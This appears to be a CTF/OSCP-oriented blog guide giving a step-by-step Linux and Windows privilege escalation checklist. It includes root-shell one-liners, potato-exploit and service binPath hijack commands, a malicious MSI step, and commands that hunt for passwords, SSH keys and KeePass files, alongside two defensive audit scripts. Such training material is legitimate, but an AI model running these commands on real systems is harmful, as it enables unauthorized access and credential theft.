โ† Blog
// Guides#privilege-escalation#linux#windows#oscp

The Privilege Escalation Playbook: Linux & Windows

A practical, command-driven walkthrough for Linux & Windows boxes: HackTheBox / OSCP style. The exact mental model Doomsknight uses on every box, from stable shell to root flag.

2026-05-01

Privilege Escalation

Published by Doomsknight · KnightSec · Reading time: ~15 minutes


Introduction

If you've ever sat staring at a low-priv shell wondering "now what?", this post is for you.

Privilege escalation is the art of turning a foothold into ownership. It's where most CTF players (and honestly, most pentesters) get stuck. The trick isn't memorizing every CVE, it's having a methodical checklist you can run top-down, knowing the cheap, common wins come first and the noisy kernel exploits come dead last.

What follows is the exact mental model I use on every box. Work through it in order. Don't skip steps because you "feel" the answer is somewhere else, discipline beats intuition here.


๐Ÿง Part 1: Linux Privilege Escalation

0. First Thing: Get a Stable Shell

Before anything else, upgrade your shell. A broken reverse shell where Ctrl+C kills your session and tab-completion doesn't work will cost you hours. Fix it now.

BASH
python3 -c 'import pty; pty.spawn("/bin/bash")'
# then Ctrl+Z
stty raw -echo; fg
export TERM=xterm

1. System & Kernel Enumeration

BASH
uname -a                  # kernel version
cat /etc/os-release       # distro
arch                      # 32 vs 64 bit
hostname

Note the kernel version and check exploit-db or run searchsploit linux kernel <version>. But, and this is important, don't lead with kernel exploits. They're noisy, can crash the box, and reset your progress. Save them for last.

2. User Context (always start here)

BASH
id
whoami
groups
sudo -l                   # ★ huge: check NOPASSWD entries
grep -v nologin /etc/passwd
cat /etc/group

If sudo -l shows any binary, your next stop is GTFOBins (https://gtfobins.github.io). That site alone solves a startling percentage of easy/medium boxes.

Watch out for these groups: docker, lxd, disk, adm, video, sudo, wheel; each has a known abuse path.

3. SUID / SGID Binaries

BASH
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null

Cross-reference each non-default binary with GTFOBins. Standard ones (passwd, su, mount, ping) are usually safe. The interesting ones, find, nmap, vim, python, or anything custom, are gold.

4. Linux Capabilities

BASH
getcap -r / 2>/dev/null

cap_setuid+ep on python, perl, or ruby is an instant root. Example:

BASH
python -c 'import os; os.setuid(0); os.system("/bin/sh")'

5. Cron Jobs

BASH
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
cat /var/spool/cron/crontabs/* 2>/dev/null

Look for writable scripts run by root. Two specific patterns to hunt for: PATH manipulation in crontab and wildcard issues (e.g. tar * in a writable dir, a classic).

6. Writable Files & PATH Hijacking

BASH
find / -writable -type d 2>/dev/null            # writable dirs
find / -perm -o+w -type f 2>/dev/null           # world-writable files
echo $PATH

If a script run by root calls a binary by name (no full path), and any earlier $PATH entry is writable, drop a malicious binary there. Done.
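To turn sections 5 and 6 into a repeatable check, here is an added audit script (mine, not the post's own tooling) that parses a system crontab and flags the three conditions described above: a command called by bare name while an earlier PATH entry is writable, a root-run script that the current account can write, and an unquoted glob in the command. The sample crontab is constructed, and the writable() check is injectable so the script can be exercised offline.

```python
import os, re, shlex
# Constructed sample in system-crontab format (not taken from a real host).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/home/user/bin:/usr/local/sbin:/usr/sbin:/usr/bin:/sbin:/bin
*/5 * * * * root backup.sh
0 2 * * * root cd /var/www/uploads && tar czf /backups/site.tgz *
17 * * * * root /usr/bin/find /tmp -mtime +7 -delete
"""
SHELL_BUILTINS = {"cd", "export", "umask", "exit", "set"}

def parse_system_crontab(text):
    """Return (env, entries); each entry is (user, command)."""
    env, entries = {}, []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"^([A-Za-z_]\w*)=(.*)$", line)   # SHELL=, PATH=, MAILTO=
        if m:
            env[m.group(1)] = m.group(2).strip('"')
            continue
        fields = line.split(None, 6)                  # m h dom mon dow user cmd
        if len(fields) == 7:
            entries.append((fields[5], fields[6]))
    return env, entries

def audit_entry(user, command, path_dirs, writable=None):
    """Findings for one entry; 'writable' is injectable so tests stay offline."""
    writable = writable or (lambda p: os.access(p, os.W_OK))
    findings = []
    for segment in re.split(r"\s*(?:&&|\|\||;|\|)\s*", command):  # cd .. && tar ..
        argv = shlex.split(segment)
        if not argv or argv[0] in SHELL_BUILTINS:
            continue
        prog = argv[0]
        if "/" not in prog:
            # Bare name: PATH is walked in order; a writable dir before the real binary wins.
            for d in path_dirs:
                if writable(d):
                    findings.append(f"{prog}: resolved via writable PATH dir {d}")
                    break
                if os.path.isfile(os.path.join(d, prog)):
                    break
        elif writable(prog):
            findings.append(f"{prog}: run as {user} but writable by this account")
        if any(re.search(r"[*?]", a) for a in argv[1:]):
            findings.append(f"{prog}: unquoted glob expands in the working directory")
    return findings
```

Run it over the real /etc/crontab with the default writable() to get findings for the account you hold; every hit is also the fix list for the box owner (absolute paths, a sane PATH line, no globs in root cron jobs).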

7. Credentials & Secrets Hunting

BASH
cat ~/.bash_history
cat /home/*/.bash_history 2>/dev/null
grep -r -i "password" /etc/ 2>/dev/null
grep -r -i "passwd" /var/www/ 2>/dev/null
find / -name "*.conf" -readable 2>/dev/null
find / -name "id_rsa*" 2>/dev/null
find / -name "*.kdbx" 2>/dev/null               # KeePass DBs
cat /etc/fstab                                  # mount creds sometimes here

Always check web roots: /var/www/html, /opt/, /srv/ for DB creds and config files. Files like mysql_history, psql_history, and .viminfo often leak commands with passwords still in them.

8. SSH Keys

BASH
ls -la ~/.ssh /home/*/.ssh /root/.ssh 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
find / -name "id_rsa" 2>/dev/null

A world-readable private key is direct lateral or vertical movement.

9. NFS Mounts

BASH
cat /etc/exports
showmount -e <target>          # from attacker box

no_root_squash → mount the share as root locally and drop a SUID binary. Easy win when it shows up.

10. Docker / LXD Group

11. Sudo Misconfigurations / Version

BASH
sudo --version

12. Services & Processes

BASH
ps auxf
ps -ef | grep root
netstat -tulnp 2>/dev/null
ss -tulnp

Internal services bound to 127.0.0.1 are often the path. Port-forward them and have a look.

13. Automated Enumeration (run ONE then verify manually)


🪟 Part 2: Windows Privilege Escalation

Windows priv-esc has a different rhythm. Where Linux rewards reading config files, Windows rewards reading token privileges and service ACLs. Start there.

1. Baseline Enumeration

CMD
whoami /all
whoami /priv
whoami /groups
systeminfo
hostname
net user
net localgroup administrators

2. Token Privileges (★ check first, biggest wins)

Look at whoami /priv for any of these:

Privilege                 Exploit
SeImpersonatePrivilege    JuicyPotato / PrintSpoofer / GodPotato / RoguePotato
SeAssignPrimaryToken      Same potato family
SeBackupPrivilege         Read SAM/SYSTEM hives → dump hashes
SeRestorePrivilege        Overwrite system files
SeTakeOwnership           Take ownership of sensitive files
SeDebugPrivilege          Inject into SYSTEM processes
SeLoadDriver              Load malicious driver

If you're a service account (IIS APPPOOL\*, NT SERVICE\*, mssql-svc) → almost always SeImpersonate → PrintSpoofer is the modern go-to.

CMD
PrintSpoofer.exe -i -c cmd
GodPotato.exe -cmd "cmd /c whoami"

3. Unquoted Service Paths

CMD
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

If the path is C:\Program Files\Some Folder\service.exe (unquoted, with spaces) and any parent dir is writable → drop Program.exe.
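As an added example (not from the post), the following models the lookup order Windows applies to an unquoted ImagePath with spaces, so you can list exactly which directories need their write ACLs checked (and then quote the path). The sample pathnames are constructed; the only assumption is the split-at-each-space behaviour described above.

```python
import ntpath
import re

# Constructed sample 'pathname' values, as the wmic query above would print them.
SAMPLE_PATHNAMES = [
    r"C:\Program Files\Some Folder\service.exe",
    r'"C:\Program Files\Some Folder\service.exe"',
    r"C:\Windows\system32\svchost.exe -k netsvcs",
    r"C:\Program Files\Vendor App\svc.exe -config x",
]

def binary_path(pathname):
    """Executable part of a service ImagePath, with quotes and arguments removed."""
    p = pathname.strip()
    if p.startswith('"'):                      # quoted: everything up to the closing quote
        end = p.find('"', 1)
        return p[1:end] if end > 0 else p[1:]
    m = re.search(r"\.exe\b", p, re.IGNORECASE)   # unquoted: keep through the first .exe
    return p[:m.end()] if m else p.split(" ", 1)[0]

def is_unquoted_with_spaces(pathname):
    """The condition the section describes: no quotes and a space in the path."""
    return not pathname.strip().startswith('"') and " " in binary_path(pathname)

def lookup_candidates(pathname):
    """Paths the service controller tries, in order, before the intended binary.
    Each space is a cut point: 'C:\\Program Files\\X\\s.exe' -> C:\\Program.exe, ..."""
    if not is_unquoted_with_spaces(pathname):
        return []
    parts = binary_path(pathname).split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]

def directories_to_audit(pathname):
    """Parent directories whose write ACLs decide whether the path is abusable;
    check these with accesschk/icacls, then fix the service by quoting its path."""
    return sorted({ntpath.dirname(c) for c in lookup_candidates(pathname)})

def report(pathnames=SAMPLE_PATHNAMES):
    """Map each vulnerable pathname to the directories needing ACL review."""
    return {p: directories_to_audit(p) for p in pathnames if is_unquoted_with_spaces(p)}
```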

4. Service Permissions

CMD
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Users" *

SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG on a service → modify binPath to your payload, restart.

CMD
sc config <service> binPath= "C:\path\to\rev.exe"
sc start <service>

5. AlwaysInstallElevated

CMD
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Both = 0x1 → craft an MSI with msfvenom, run msiexec /quiet /qn /i evil.msi → SYSTEM.

6. Stored Credentials

CMD
cmdkey /list
runas /savecred /user:ADMIN cmd
dir /a:h /s C:\Users\*.kdbx 2>nul
findstr /si "password" *.xml *.ini *.txt *.config 2>nul

Two unsexy but reliable hunting spots:

7. Registry Autoruns & Writable Keys

CMD
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run

If a Run entry points to a writable binary → replace it.

8. Scheduled Tasks

CMD
schtasks /query /fo LIST /v

Look for tasks running as a higher-priv user with writable script paths.

9. DLL Hijacking

Use Process Monitor (or look at imports) → find a process searching for a missing DLL in a writable location → drop your DLL there.

10. Saved Browser / App Creds

11. Automated Enumeration

12. Kernel / Patch Exploits (last resort)

CMD
systeminfo > sysinfo.txt

Feed to Windows Exploit Suggester (WES-NG) offline. Common hits: Juicy Potato (≤ Server 2016), MS16-032, MS17-010 (yes, sometimes still on HTB easy boxes), PrintNightmare (CVE-2021-34527).


📚 Reference Cheatsheets: Bookmark These

Resource                  URL
GTFOBins (Linux)          https://gtfobins.github.io
LOLBAS (Windows)          https://lolbas-project.github.io
HackTricks                https://book.hacktricks.xyz
PayloadsAllTheThings      https://github.com/swisskyrepo/PayloadsAllTheThings
PEASS-ng                  https://github.com/peass-ng/PEASS-ng

🎯 General Methodology: The Six Rules

  1. Get a stable shell first. Don't enumerate from a broken reverse shell.
  2. Manual enumeration before automated. sudo -l, id and whoami /priv alone solve 60% of easy/medium boxes.
  3. One automated tool, then verify. Run LinPEAS/WinPEAS, but read the output, don't blindly trust the red highlights.
  4. Pivot through internal services. A service bound to 127.0.0.1 that you can hit is often the answer.
  5. Document credentials as you find them. A user password often gets reused for sudo, su, SSH, or admin services.
  6. If stuck for >30 min: re-enumerate as the new user. Every shell context is a new enumeration cycle.

Closing Thoughts

Privilege escalation is less about being clever and more about being thorough. The boxes that crush you aren't the ones with obscure exploits, they're the ones where you skipped step 2 because you assumed it'd be empty.

Run the checklist. Trust the process. The root flag will follow.

If this helped, share it with someone who's grinding through their first OSCP-style box. And if you spot a technique I've missed, drop me a note. This list grows every time I learn something new.

- Doomsknight


Have feedback or want to discuss a technique? Reach out via WhatsApp, +1 (347) 260-3596.

โ† Back to blog